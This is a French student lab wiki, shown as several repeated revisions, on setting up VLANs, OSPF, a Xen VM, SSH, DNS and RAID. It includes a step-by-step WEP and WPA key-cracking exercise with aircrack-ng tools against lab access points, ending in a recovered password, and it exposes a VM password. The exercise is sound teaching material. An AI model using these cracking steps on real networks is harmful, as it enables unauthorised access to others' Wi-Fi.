xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 1H<br />
@ IN SOA ns.anosteke59.site (<br />
12 ; serial number YYMMDDNN<br />
1H ; Refresh<br />
1H ; Retry<br />
1D ; Expire<br />
1H ; Min TTL<br />
)<br />
IN NS ns.anosteke59.site.<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME WWW<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
<br />
<br />
=== Tests d’intrusion ===<br />
<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57665TP sysres IMA5 2021/2022 G72022-01-10T15:28:03Z<p>Avercaem : /* WEP */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 1H<br />
@ IN SOA ns.anosteke59.site (<br />
12 ; serial number YYMMDDNN<br />
1H ; Refresh<br />
1H ; Retry<br />
1D ; Expire<br />
1H ; Min TTL<br />
)<br />
IN NS ns.anosteke59.site.<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME WWW<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
=== Tests d’intrusion ===<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57042TP sysres IMA5 2021/2022 G72021-12-13T16:28:10Z<p>Avercaem : /* WPA */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 86400<br />
@ IN SOA ns.anosteke59.site. postmaster.anosteke59.site. (<br />
2021112901 ; serial number YYMMDDNN<br />
28800 ; Refresh<br />
7200 ; Retry<br />
864000 ; Expire<br />
86400 ; Min TTL<br />
)<br />
NS ns.anosteke59.site.<br />
NS ns6.gandi.net. <br />
$ORIGIN anosteke59.site.<br />
ns IN A 193.48.57.182<br />
www IN CNAME ns<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
=== Tests d’intrusion ===<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 3<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 3 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 44:DA:D2:9C:50:53 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 3 --bssid 44:DA:D2:9C:50:53 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56979TP sysres IMA5 2021/2022 G72021-12-13T15:09:43Z<p>Avercaem : /* PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
